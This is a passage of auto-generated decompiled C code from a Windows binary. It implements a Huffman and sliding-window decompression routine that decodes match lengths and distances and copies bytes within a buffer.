                                                    				void* _t700;
                                                    
                                                    				L0:
                                                    				while(1) {
                                                    					L0:
                                                    					_t684 = __esi;
                                                    					_t525 = __esi + 0x7c;
                                                    					while(1) {
                                                    						L1:
                                                    						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
                                                    						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
                                                    							goto L11;
                                                    						} else {
                                                    							_t513 = _t684 + 0x8c;
                                                    							goto L3;
                                                    						}
                                                    						while(1) {
                                                    							L3:
                                                    							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
                                                    							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
                                                    								break;
                                                    							}
                                                    							L6:
                                                    							if( *((char*)(_t684 + 0x9c)) != 0) {
                                                    								L97:
                                                    								_t360 = E00CD5202(_t684);
                                                    								L98:
                                                    								return _t360;
                                                    							}
                                                    							L7:
                                                    							_push(_t513);
                                                    							_push(_t689);
                                                    							_t360 = E00CD3E0B(_t684);
                                                    							if(_t360 == 0) {
                                                    								goto L98;
                                                    							}
                                                    							L8:
                                                    							_push(_t684 + 0xa0);
                                                    							_push(_t513);
                                                    							_push(_t689);
                                                    							_t360 = E00CD43BF(_t684);
                                                    							if(_t360 != 0) {
                                                    								continue;
                                                    							} else {
                                                    								goto L98;
                                                    							}
                                                    						}
                                                    						L10:
                                                    						_t496 = E00CD4E52(_t684);
                                                    						__eflags = _t496;
                                                    						if(_t496 == 0) {
                                                    							goto L97;
                                                    						}
                                                    						L11:
                                                    						_t526 =  *((intOrPtr*)(_t684 + 0x4b3c));
                                                    						__eflags = (_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) - 0x1004;
                                                    						if((_t526 -  *(_t684 + 0x7c) &  *(_t684 + 0xe6dc)) >= 0x1004) {
                                                    							L17:
                                                    							_t344 = E00CCA89D(_t689);
                                                    							_t345 =  *(_t684 + 0x124);
                                                    							_t633 = _t344 & 0x0000fffe;
                                                    							__eflags = _t633 -  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4));
                                                    							if(_t633 >=  *((intOrPtr*)(_t684 + 0xa4 + _t345 * 4))) {
                                                    								L19:
                                                    								_t671 = 0xf;
                                                    								_t346 = _t345 + 1;
                                                    								__eflags = _t346 - _t671;
                                                    								if(_t346 >= _t671) {
                                                    									L25:
                                                    									_t499 = _t689[1] + _t671;
                                                    									_t348 = _t499 >> 3;
                                                    									 *_t689 =  *_t689 + _t348;
                                                    									 *(_t697 + 0x10) =  *_t689;
                                                    									_t689[1] = _t499 & 0x00000007;
                                                    									_t529 = 0x10;
                                                    									_t532 =  *((intOrPtr*)(_t684 + 0xe4 + _t671 * 4)) + (_t633 -  *((intOrPtr*)(_t684 + 0xa0 + _t671 * 4)) >> _t529 - _t671);
                                                    									__eflags = _t532 -  *((intOrPtr*)(_t684 + 0xa0));
                                                    									asm("sbb eax, eax");
                                                    									_t349 = _t348 & _t532;
                                                    									__eflags = _t349;
                                                    									_t672 =  *(_t684 + 0xd28 + _t349 * 2) & 0x0000ffff;
                                                    									_t350 =  *(_t697 + 0x10);
                                                    									goto L26;
                                                    								} else {
                                                    									_t625 = _t684 + (_t346 + 0x29) * 4;
                                                    									while(1) {
                                                    										L21:
                                                    										__eflags = _t633 -  *_t625;
                                                    										if(_t633 <  *_t625) {
                                                    											_t671 = _t346;
                                                    											goto L25;
                                                    										}
                                                    										L22:
                                                    										_t346 = _t346 + 1;
                                                    										_t625 = _t625 + 4;
                                                    										__eflags = _t346 - 0xf;
                                                    										if(_t346 < 0xf) {
                                                    											continue;
                                                    										} else {
                                                    											goto L25;
                                                    										}
                                                    									}
                                                    									goto L25;
                                                    								}
                                                    							} else {
                                                    								_t626 = 0x10;
                                                    								_t670 = _t633 >> _t626 - _t345;
                                                    								_t508 = ( *(_t670 + _t684 + 0x128) & 0x000000ff) + _t689[1];
                                                    								 *_t689 =  *_t689 + (_t508 >> 3);
                                                    								_t504 = _t508 & 0x00000007;
                                                    								_t350 =  *_t689;
                                                    								_t689[1] = _t504;
                                                    								_t672 =  *(_t684 + 0x528 + _t670 * 2) & 0x0000ffff;
                                                    								 *(_t697 + 0x10) = _t350;
                                                    								L26:
                                                    								_t636 = _t672 & 0x0000ffff;
                                                    								__eflags = _t636 - 0x100;
                                                    								if(_t636 >= 0x100) {
                                                    									L30:
                                                    									__eflags = _t636 - 0x106;
                                                    									if(_t636 < 0x106) {
                                                    										L94:
                                                    										__eflags = _t636 - 0x100;
                                                    										if(_t636 != 0x100) {
                                                    											L100:
                                                    											__eflags = _t636 - 0x101;
                                                    											if(_t636 != 0x101) {
                                                    												L125:
                                                    												_t637 = _t636 + 0xfffffefe;
                                                    												__eflags = _t637;
                                                    												_t535 = _t684 + (_t637 + 0x18) * 4;
                                                    												_t501 =  *_t535;
                                                    												 *(_t697 + 0x18) = _t501;
                                                    												if(_t637 == 0) {
                                                    													L127:
                                                    													 *(_t684 + 0x60) = _t501;
                                                    													_t351 = E00CCA89D(_t689);
                                                    													_t352 =  *(_t684 + 0x2de8);
                                                    													_t639 = _t351 & 0x0000fffe;
                                                    													__eflags = _t639 -  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4));
                                                    													if(_t639 >=  *((intOrPtr*)(_t684 + 0x2d68 + _t352 * 4))) {
                                                    														L129:
                                                    														_t673 = 0xf;
                                                    														_t353 = _t352 + 1;
                                                    														__eflags = _t353 - _t673;
                                                    														if(_t353 >= _t673) {
                                                    															L135:
                                                    															_t538 = _t689[1] + _t673;
                                                    															_t539 = _t538 & 0x00000007;
                                                    															_t689[1] = _t539;
                                                    															_t355 = _t538 >> 3;
                                                    															 *_t689 =  *_t689 + _t355;
                                                    															 *(_t697 + 0x20) = _t539;
                                                    															_t540 = 0x10;
                                                    															_t543 =  *((intOrPtr*)(_t684 + 0x2da8 + _t673 * 4)) + (_t639 -  *((intOrPtr*)(_t684 + 0x2d64 + _t673 * 4)) >> _t540 - _t673);
                                                    															__eflags = _t543 -  *((intOrPtr*)(_t684 + 0x2d64));
                                                    															asm("sbb eax, eax");
                                                    															_t356 = _t355 & _t543;
                                                    															__eflags = _t356;
                                                    															_t357 =  *(_t684 + 0x39ec + _t356 * 2) & 0x0000ffff;
                                                    															L136:
                                                    															_t674 = _t357 & 0x0000ffff;
                                                    															__eflags = _t674 - 8;
                                                    															if(_t674 >= 8) {
                                                    																_t504 = (_t674 >> 2) - 1;
                                                    																_t678 = ((_t674 & 0x00000003 | 0x00000004) << _t504) + 2;
                                                    																__eflags = _t504;
                                                    																if(_t504 != 0) {
                                                    																	_t409 = E00CCA89D(_t689);
                                                    																	_t556 = 0x10;
                                                    																	_t678 = _t678 + (_t409 >> _t556 - _t504);
                                                    																	_t559 =  *(_t697 + 0x20) + _t504;
                                                    																	 *_t689 =  *_t689 + (_t559 >> 3);
                                                    																	_t560 = _t559 & 0x00000007;
                                                    																	__eflags = _t560;
                                                    																	_t689[1] = _t560;
                                                    																}
                                                    															} else {
                                                    																_t678 = _t674 + 2;
                                                    															}
                                                    															__eflags =  *((char*)(_t684 + 0x4c44));
                                                    															_t545 =  *(_t697 + 0x18);
                                                    															 *(_t684 + 0x74) = _t678;
                                                    															if( *((char*)(_t684 + 0x4c44)) == 0) {
                                                    																L142:
                                                    																_t642 =  *(_t684 + 0x7c);
                                                    																_t506 = _t642 - _t545;
                                                    																_t359 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
                                                    																__eflags = _t506 - _t359;
                                                    																if(_t506 >= _t359) {
                                                    																	goto L152;
                                                    																}
                                                    																L143:
                                                    																__eflags = _t642 - _t359;
                                                    																if(_t642 >= _t359) {
                                                    																	goto L152;
                                                    																}
                                                    																L144:
                                                    																_t363 =  *((intOrPtr*)(_t684 + 0x4b40));
                                                    																_t512 = _t506 + _t363;
                                                    																_t692 = _t642 + _t363;
                                                    																_t645 = 8;
                                                    																 *(_t684 + 0x7c) = _t642 + _t678;
                                                    																__eflags = _t678 - _t645;
                                                    																if(_t678 < _t645) {
                                                    																	L114:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	__eflags = _t678;
                                                    																	if(_t678 == 0) {
                                                    																		L89:
                                                    																		_t689 = _t684 + 4;
                                                    																		continue;
                                                    																	}
                                                    																	L115:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	 *_t692 =  *_t512;
                                                    																	__eflags = _t678 - 1;
                                                    																	if(_t678 <= 1) {
                                                    																		goto L89;
                                                    																	}
                                                    																	L116:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
                                                    																	__eflags = _t678 - 2;
                                                    																	if(_t678 <= 2) {
                                                    																		goto L89;
                                                    																	}
                                                    																	L117:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
                                                    																	__eflags = _t678 - 3;
                                                    																	if(_t678 <= 3) {
                                                    																		goto L89;
                                                    																	}
                                                    																	L118:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
                                                    																	__eflags = _t678 - 4;
                                                    																	if(_t678 <= 4) {
                                                    																		goto L89;
                                                    																	}
                                                    																	L119:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
                                                    																	__eflags = _t678 - 5;
                                                    																	if(_t678 <= 5) {
                                                    																		goto L89;
                                                    																	}
                                                    																	L120:
                                                    																	_t525 = _t684 + 0x7c;
                                                    																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
                                                    																	__eflags = _t678 - 6;
                                                    																	if(_t678 <= 6) {
                                                    																		goto L89;
                                                    																	}
                                                    																	L121:
                                                    																	_t360 =  *((intOrPtr*)(_t512 + 6));
                                                    																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
                                                    																	goto L155;
                                                    																}
                                                    																L145:
                                                    																__eflags = _t545 - _t678;
                                                    																if(_t545 >= _t678) {
                                                    																	L149:
                                                    																	_t372 = _t678 >> 3;
                                                    																	__eflags = _t372;
                                                    																	 *(_t697 + 0x20) = _t372;
                                                    																	_t686 = _t372;
                                                    																	do {
                                                    																		L150:
                                                    																		E00CE0320(_t692, _t512, _t645);
                                                    																		_t697 = _t697 + 0xc;
                                                    																		_t645 = 8;
                                                    																		_t512 = _t512 + _t645;
                                                    																		_t692 = _t692 + _t645;
                                                    																		_t678 = _t678 - _t645;
                                                    																		_t686 = _t686 - 1;
                                                    																		__eflags = _t686;
                                                    																	} while (_t686 != 0);
                                                    																	L113:
                                                    																	_t684 =  *((intOrPtr*)(_t697 + 0x1c));
                                                    																	goto L114;
                                                    																}
                                                    																L146:
                                                    																_t548 = _t678 >> 3;
                                                    																__eflags = _t548;
                                                    																do {
                                                    																	L147:
                                                    																	_t678 = _t678 - _t645;
                                                    																	 *_t692 =  *_t512;
                                                    																	 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
                                                    																	 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
                                                    																	 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
                                                    																	 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
                                                    																	 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
                                                    																	 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
                                                    																	_t381 =  *((intOrPtr*)(_t512 + 7));
                                                    																	_t512 = _t512 + _t645;
                                                    																	 *((char*)(_t692 + 7)) = _t381;
                                                    																	_t692 = _t692 + _t645;
                                                    																	_t548 = _t548 - 1;
                                                    																	__eflags = _t548;
                                                    																} while (_t548 != 0);
                                                    																goto L114;
                                                    															} else {
                                                    																L141:
                                                    																_push( *(_t684 + 0xe6dc));
                                                    																_push(_t684 + 0x7c);
                                                    																_push(_t545);
                                                    																L70:
                                                    																_push(_t678);
                                                    																E00CD2C30();
                                                    																while(1) {
                                                    																	L0:
                                                    																	_t684 = __esi;
                                                    																	_t525 = __esi + 0x7c;
                                                    																	do {
                                                    																		do {
                                                    																			goto L3;
                                                    																			L152:
                                                    																			_t525 = _t684 + 0x7c;
                                                    																			__eflags = _t678;
                                                    																		} while (_t678 == 0);
                                                    																		_t360 =  *(_t684 + 0xe6dc);
                                                    																		do {
                                                    																			L154:
                                                    																			_t361 = _t360 & _t506;
                                                    																			_t506 = _t506 + 1;
                                                    																			 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t642)) =  *((intOrPtr*)(_t361 +  *((intOrPtr*)(_t684 + 0x4b40))));
                                                    																			_t360 =  *(_t684 + 0xe6dc);
                                                    																			_t642 =  *(_t684 + 0x7c) + 0x00000001 & _t360;
                                                    																			 *(_t684 + 0x7c) = _t642;
                                                    																			_t678 = _t678 - 1;
                                                    																			__eflags = _t678;
                                                    																		} while (_t678 != 0);
                                                    																		L155:
                                                    																		goto L0;
                                                    																		do {
                                                    																			while(1) {
                                                    																				L0:
                                                    																				_t684 = __esi;
                                                    																				_t525 = __esi + 0x7c;
                                                    																				L1:
                                                    																				 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
                                                    																				if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
                                                    																					goto L11;
                                                    																				} else {
                                                    																					_t513 = _t684 + 0x8c;
                                                    																					goto L3;
                                                    																				}
                                                    																			}
                                                    																			L96:
                                                    																			_t438 = E00CD253E(_t684, _t697 + 0x28);
                                                    																			__eflags = _t438;
                                                    																		} while (_t438 != 0);
                                                    																		goto L97;
                                                    																		L90:
                                                    																		_t525 = _t684 + 0x7c;
                                                    																		__eflags = _t678;
                                                    																	} while (_t678 == 0);
                                                    																	_t386 =  *(_t684 + 0xe6dc);
                                                    																	_t514 =  *(_t697 + 0x20);
                                                    																	do {
                                                    																		L92:
                                                    																		_t387 = _t386 & _t514;
                                                    																		_t514 = _t514 + 1;
                                                    																		 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t387 +  *((intOrPtr*)(_t684 + 0x4b40))));
                                                    																		_t386 =  *(_t684 + 0xe6dc);
                                                    																		_t646 =  *(_t684 + 0x7c) + 0x00000001 & _t386;
                                                    																		 *(_t684 + 0x7c) = _t646;
                                                    																		_t678 = _t678 - 1;
                                                    																		__eflags = _t678;
                                                    																	} while (_t678 != 0);
                                                    																	goto L155;
                                                    																}
                                                    															}
                                                    														}
                                                    														L130:
                                                    														_t562 = _t684 + (_t353 + 0xb5a) * 4;
                                                    														while(1) {
                                                    															L131:
                                                    															__eflags = _t639 -  *_t562;
                                                    															if(_t639 <  *_t562) {
                                                    																break;
                                                    															}
                                                    															L132:
                                                    															_t353 = _t353 + 1;
                                                    															_t562 = _t562 + 4;
                                                    															__eflags = _t353 - 0xf;
                                                    															if(_t353 < 0xf) {
                                                    																continue;
                                                    															}
                                                    															L133:
                                                    															goto L135;
                                                    														}
                                                    														L134:
                                                    														_t673 = _t353;
                                                    														goto L135;
                                                    													}
                                                    													L128:
                                                    													_t563 = 0x10;
                                                    													_t650 = _t639 >> _t563 - _t352;
                                                    													_t524 = ( *(_t650 + _t684 + 0x2dec) & 0x000000ff) + _t689[1];
                                                    													 *_t689 =  *_t689 + (_t524 >> 3);
                                                    													_t504 = _t524 & 0x00000007;
                                                    													_t689[1] = _t504;
                                                    													_t357 =  *(_t684 + 0x31ec + _t650 * 2) & 0x0000ffff;
                                                    													 *(_t697 + 0x20) = _t504;
                                                    													goto L136;
                                                    												} else {
                                                    													goto L126;
                                                    												}
                                                    												do {
                                                    													L126:
                                                    													 *_t535 =  *(_t535 - 4);
                                                    													_t535 = _t535 - 4;
                                                    													_t637 = _t637 - 1;
                                                    													__eflags = _t637;
                                                    												} while (_t637 != 0);
                                                    												goto L127;
                                                    											}
                                                    											L101:
                                                    											_t678 =  *(_t684 + 0x74);
                                                    											__eflags = _t678;
                                                    											if(_t678 == 0) {
                                                    												while(1) {
                                                    													L0:
                                                    													_t684 = __esi;
                                                    													_t525 = __esi + 0x7c;
                                                    													goto L1;
                                                    												}
                                                    											}
                                                    											L102:
                                                    											__eflags =  *((char*)(_t684 + 0x4c44));
                                                    											if( *((char*)(_t684 + 0x4c44)) == 0) {
                                                    												L104:
                                                    												_t651 =  *(_t684 + 0x7c);
                                                    												_t565 =  *(_t684 + 0x60);
                                                    												_t417 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
                                                    												_t510 = _t651 - _t565;
                                                    												__eflags = _t510 - _t417;
                                                    												if(_t510 >= _t417) {
                                                    													L122:
                                                    													_t418 =  *(_t684 + 0xe6dc);
                                                    													do {
                                                    														L123:
                                                    														_t419 = _t418 & _t510;
                                                    														_t510 = _t510 + 1;
                                                    														 *((char*)( *((intOrPtr*)(_t684 + 0x4b40)) + _t651)) =  *((intOrPtr*)(_t419 +  *((intOrPtr*)(_t684 + 0x4b40))));
                                                    														_t418 =  *(_t684 + 0xe6dc);
                                                    														_t651 =  *(_t684 + 0x7c) + 0x00000001 & _t418;
                                                    														 *(_t684 + 0x7c) = _t651;
                                                    														_t678 = _t678 - 1;
                                                    														__eflags = _t678;
                                                    													} while (_t678 != 0);
                                                    													goto L155;
                                                    												}
                                                    												L105:
                                                    												__eflags = _t651 - _t417;
                                                    												if(_t651 >= _t417) {
                                                    													goto L122;
                                                    												}
                                                    												L106:
                                                    												_t421 =  *((intOrPtr*)(_t684 + 0x4b40));
                                                    												_t512 = _t510 + _t421;
                                                    												_t692 = _t651 + _t421;
                                                    												_t654 = 8;
                                                    												 *(_t684 + 0x7c) = _t651 + _t678;
                                                    												__eflags = _t678 - _t654;
                                                    												if(_t678 < _t654) {
                                                    													goto L114;
                                                    												}
                                                    												L107:
                                                    												__eflags = _t565 - _t678;
                                                    												if(_t565 >= _t678) {
                                                    													L111:
                                                    													_t424 = _t678 >> 3;
                                                    													__eflags = _t424;
                                                    													 *(_t697 + 0x20) = _t424;
                                                    													_t688 = _t424;
                                                    													do {
                                                    														L112:
                                                    														E00CE0320(_t692, _t512, _t654);
                                                    														_t697 = _t697 + 0xc;
                                                    														_t654 = 8;
                                                    														_t512 = _t512 + _t654;
                                                    														_t692 = _t692 + _t654;
                                                    														_t678 = _t678 - _t654;
                                                    														_t688 = _t688 - 1;
                                                    														__eflags = _t688;
                                                    													} while (_t688 != 0);
                                                    													goto L113;
                                                    												}
                                                    												L108:
                                                    												_t568 = _t678 >> 3;
                                                    												__eflags = _t568;
                                                    												do {
                                                    													L109:
                                                    													_t678 = _t678 - _t654;
                                                    													 *_t692 =  *_t512;
                                                    													 *((char*)(_t692 + 1)) =  *((intOrPtr*)(_t512 + 1));
                                                    													 *((char*)(_t692 + 2)) =  *((intOrPtr*)(_t512 + 2));
                                                    													 *((char*)(_t692 + 3)) =  *((intOrPtr*)(_t512 + 3));
                                                    													 *((char*)(_t692 + 4)) =  *((intOrPtr*)(_t512 + 4));
                                                    													 *((char*)(_t692 + 5)) =  *((intOrPtr*)(_t512 + 5));
                                                    													 *((char*)(_t692 + 6)) =  *((intOrPtr*)(_t512 + 6));
                                                    													_t433 =  *((intOrPtr*)(_t512 + 7));
                                                    													_t512 = _t512 + _t654;
                                                    													 *((char*)(_t692 + 7)) = _t433;
                                                    													_t692 = _t692 + _t654;
                                                    													_t568 = _t568 - 1;
                                                    													__eflags = _t568;
                                                    												} while (_t568 != 0);
                                                    												goto L114;
                                                    											}
                                                    											L103:
                                                    											_push( *(_t684 + 0xe6dc));
                                                    											_push(_t684 + 0x7c);
                                                    											_push( *(_t684 + 0x60));
                                                    											goto L70;
                                                    										}
                                                    										L95:
                                                    										_push(_t697 + 0x28);
                                                    										_t436 = E00CD3F9D(_t684, _t689);
                                                    										__eflags = _t436;
                                                    										if(_t436 == 0) {
                                                    											goto L97;
                                                    										}
                                                    										goto L96;
                                                    									}
                                                    									L31:
                                                    									_t680 = _t636 - 0x106;
                                                    									__eflags = _t680 - 8;
                                                    									if(_t680 >= 8) {
                                                    										_t441 = (_t680 >> 2) - 1;
                                                    										 *(_t697 + 0x20) = _t441;
                                                    										_t678 = ((_t680 & 0x00000003 | 0x00000004) << _t441) + 2;
                                                    										__eflags = _t441;
                                                    										if(_t441 != 0) {
                                                    											_t482 = E00CCA89D(_t689);
                                                    											_t522 = _t504 +  *(_t697 + 0x20);
                                                    											_t616 = 0x10;
                                                    											_t678 = _t678 + (_t482 >> _t616 -  *(_t697 + 0x20));
                                                    											_t619 =  *(_t697 + 0x10) + (_t522 >> 3);
                                                    											_t504 = _t522 & 0x00000007;
                                                    											__eflags = _t504;
                                                    											 *(_t697 + 0x10) = _t619;
                                                    											 *_t689 = _t619;
                                                    											_t689[1] = _t504;
                                                    										}
                                                    									} else {
                                                    										 *(_t697 + 0x10) = _t350;
                                                    										_t678 = _t680 + 2;
                                                    									}
                                                    									_t442 = E00CCA89D(_t689);
                                                    									_t443 =  *(_t684 + 0x1010);
                                                    									_t656 = _t442 & 0x0000fffe;
                                                    									__eflags = _t656 -  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4));
                                                    									if(_t656 >=  *((intOrPtr*)(_t684 + 0xf90 + _t443 * 4))) {
                                                    										L37:
                                                    										_t516 = 0xf;
                                                    										_t444 = _t443 + 1;
                                                    										__eflags = _t444 - _t516;
                                                    										if(_t444 >= _t516) {
                                                    											L43:
                                                    											_t575 = _t689[1] + _t516;
                                                    											_t576 = _t575 & 0x00000007;
                                                    											_t689[1] = _t576;
                                                    											 *_t689 =  *_t689 + (_t575 >> 3);
                                                    											_t447 =  *_t689;
                                                    											 *(_t697 + 0x10) = _t576;
                                                    											_t577 = 0x10;
                                                    											 *(_t697 + 0x14) = _t447;
                                                    											_t580 =  *((intOrPtr*)(_t684 + 0xfd0 + _t516 * 4)) + (_t656 -  *((intOrPtr*)(_t684 + 0xf8c + _t516 * 4)) >> _t577 - _t516);
                                                    											__eflags = _t580 -  *((intOrPtr*)(_t684 + 0xf8c));
                                                    											asm("sbb eax, eax");
                                                    											_t448 = _t447 & _t580;
                                                    											__eflags = _t448;
                                                    											_t449 =  *(_t684 + 0x1c14 + _t448 * 2) & 0x0000ffff;
                                                    											goto L44;
                                                    										}
                                                    										L38:
                                                    										_t612 = _t684 + (_t444 + 0x3e4) * 4;
                                                    										while(1) {
                                                    											L39:
                                                    											__eflags = _t656 -  *_t612;
                                                    											if(_t656 <  *_t612) {
                                                    												break;
                                                    											}
                                                    											L40:
                                                    											_t444 = _t444 + 1;
                                                    											_t612 = _t612 + 4;
                                                    											__eflags = _t444 - 0xf;
                                                    											if(_t444 < 0xf) {
                                                    												continue;
                                                    											}
                                                    											L41:
                                                    											goto L43;
                                                    										}
                                                    										L42:
                                                    										_t516 = _t444;
                                                    										goto L43;
                                                    									} else {
                                                    										L36:
                                                    										_t613 = 0x10;
                                                    										_t666 = _t656 >> _t613 - _t443;
                                                    										 *(_t697 + 0x20) = _t666;
                                                    										_t668 = ( *(_t666 + _t684 + 0x1014) & 0x000000ff) + _t504;
                                                    										_t480 = (_t668 >> 3) +  *(_t697 + 0x10);
                                                    										_t669 = _t668 & 0x00000007;
                                                    										 *(_t697 + 0x14) = _t480;
                                                    										 *_t689 = _t480;
                                                    										_t689[1] = _t669;
                                                    										 *(_t697 + 0x10) = _t669;
                                                    										_t449 =  *(_t684 + 0x1414 +  *(_t697 + 0x20) * 2) & 0x0000ffff;
                                                    										L44:
                                                    										_t450 = _t449 & 0x0000ffff;
                                                    										__eflags = _t450 - 4;
                                                    										if(_t450 >= 4) {
                                                    											L46:
                                                    											_t696 = (_t450 >> 1) - 1;
                                                    											_t454 = ((_t450 & 0x00000001 | 0x00000002) << _t696) + 1;
                                                    											 *(_t697 + 0x20) = _t454;
                                                    											_t504 = _t454;
                                                    											 *(_t697 + 0x18) = _t504;
                                                    											__eflags = _t696;
                                                    											if(_t696 == 0) {
                                                    												L63:
                                                    												_t689 = _t684 + 4;
                                                    												L64:
                                                    												__eflags = _t504 - 0x100;
                                                    												if(_t504 > 0x100) {
                                                    													_t678 = _t678 + 1;
                                                    													__eflags = _t504 - 0x2000;
                                                    													if(_t504 > 0x2000) {
                                                    														_t678 = _t678 + 1;
                                                    														__eflags = _t504 - 0x40000;
                                                    														if(_t504 > 0x40000) {
                                                    															_t678 = _t678 + 1;
                                                    															__eflags = _t678;
                                                    														}
                                                    													}
                                                    												}
                                                    												 *(_t684 + 0x6c) =  *(_t684 + 0x68);
                                                    												 *(_t684 + 0x68) =  *(_t684 + 0x64);
                                                    												 *(_t684 + 0x64) =  *(_t684 + 0x60);
                                                    												 *(_t684 + 0x60) = _t504;
                                                    												__eflags =  *((char*)(_t684 + 0x4c44));
                                                    												 *(_t684 + 0x74) = _t678;
                                                    												if( *((char*)(_t684 + 0x4c44)) == 0) {
                                                    													L71:
                                                    													_t646 =  *(_t684 + 0x7c);
                                                    													_t551 = _t646 - _t504;
                                                    													_t385 =  *((intOrPtr*)(_t684 + 0xe6d8)) + 0xffffeffc;
                                                    													 *(_t697 + 0x20) = _t551;
                                                    													__eflags = _t551 - _t385;
                                                    													if(_t551 >= _t385) {
                                                    														goto L90;
                                                    													}
                                                    													L72:
                                                    													__eflags = _t646 - _t385;
                                                    													if(_t646 >= _t385) {
                                                    														goto L90;
                                                    													}
                                                    													L73:
                                                    													_t389 =  *((intOrPtr*)(_t684 + 0x4b40));
                                                    													_t515 = _t389 + _t551;
                                                    													_t693 = _t646 + _t389;
                                                    													_t649 = 8;
                                                    													_t525 = _t684 + 0x7c;
                                                    													 *_t525 = _t646 + _t678;
                                                    													__eflags = _t678 - _t649;
                                                    													if(_t678 < _t649) {
                                                    														L81:
                                                    														__eflags = _t678;
                                                    														if(_t678 != 0) {
                                                    															 *_t693 =  *_t515;
                                                    															__eflags = _t678 - 1;
                                                    															if(_t678 > 1) {
                                                    																 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
                                                    																__eflags = _t678 - 2;
                                                    																if(_t678 > 2) {
                                                    																	 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
                                                    																	__eflags = _t678 - 3;
                                                    																	if(_t678 > 3) {
                                                    																		 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
                                                    																		__eflags = _t678 - 4;
                                                    																		if(_t678 > 4) {
                                                    																			 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
                                                    																			__eflags = _t678 - 5;
                                                    																			if(_t678 > 5) {
                                                    																				 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
                                                    																				__eflags = _t678 - 6;
                                                    																				if(_t678 > 6) {
                                                    																					 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
                                                    																				}
                                                    																			}
                                                    																		}
                                                    																	}
                                                    																}
                                                    															}
                                                    														}
                                                    														goto L89;
                                                    													}
                                                    													L74:
                                                    													__eflags =  *(_t697 + 0x18) - _t678;
                                                    													if( *(_t697 + 0x18) >= _t678) {
                                                    														L78:
                                                    														_t399 = _t678 >> 3;
                                                    														__eflags = _t399;
                                                    														 *(_t697 + 0x20) = _t399;
                                                    														_t687 = _t399;
                                                    														do {
                                                    															L79:
                                                    															E00CE0320(_t693, _t515, _t649);
                                                    															_t697 = _t697 + 0xc;
                                                    															_t649 = 8;
                                                    															_t515 = _t515 + _t649;
                                                    															_t693 = _t693 + _t649;
                                                    															_t678 = _t678 - _t649;
                                                    															_t687 = _t687 - 1;
                                                    															__eflags = _t687;
                                                    														} while (_t687 != 0);
                                                    														_t684 =  *((intOrPtr*)(_t697 + 0x1c));
                                                    														_t525 =  *(_t697 + 0x24);
                                                    														goto L81;
                                                    													}
                                                    													L75:
                                                    													_t554 = _t678 >> 3;
                                                    													__eflags = _t554;
                                                    													do {
                                                    														L76:
                                                    														_t678 = _t678 - _t649;
                                                    														 *_t693 =  *_t515;
                                                    														 *((char*)(_t693 + 1)) =  *((intOrPtr*)(_t515 + 1));
                                                    														 *((char*)(_t693 + 2)) =  *((intOrPtr*)(_t515 + 2));
                                                    														 *((char*)(_t693 + 3)) =  *((intOrPtr*)(_t515 + 3));
                                                    														 *((char*)(_t693 + 4)) =  *((intOrPtr*)(_t515 + 4));
                                                    														 *((char*)(_t693 + 5)) =  *((intOrPtr*)(_t515 + 5));
                                                    														 *((char*)(_t693 + 6)) =  *((intOrPtr*)(_t515 + 6));
                                                    														_t408 =  *((intOrPtr*)(_t515 + 7));
                                                    														_t515 = _t515 + _t649;
                                                    														 *((char*)(_t693 + 7)) = _t408;
                                                    														_t693 = _t693 + _t649;
                                                    														_t554 = _t554 - 1;
                                                    														__eflags = _t554;
                                                    													} while (_t554 != 0);
                                                    													_t525 = _t684 + 0x7c;
                                                    													goto L81;
                                                    												} else {
                                                    													L69:
                                                    													_push( *(_t684 + 0xe6dc));
                                                    													_push(_t684 + 0x7c);
                                                    													_push(_t504);
                                                    													goto L70;
                                                    												}
                                                    											}
                                                    											L47:
                                                    											__eflags = _t696 - 4;
                                                    											if(__eflags < 0) {
                                                    												L62:
                                                    												_t459 = E00CD8934(_t684 + 4);
                                                    												_t583 = 0x20;
                                                    												_t504 = (_t459 >> _t583 - _t696) +  *(_t697 + 0x20);
                                                    												_t586 =  *(_t697 + 0x10) + _t696;
                                                    												 *(_t697 + 0x18) = _t504;
                                                    												_t689 = _t684 + 4;
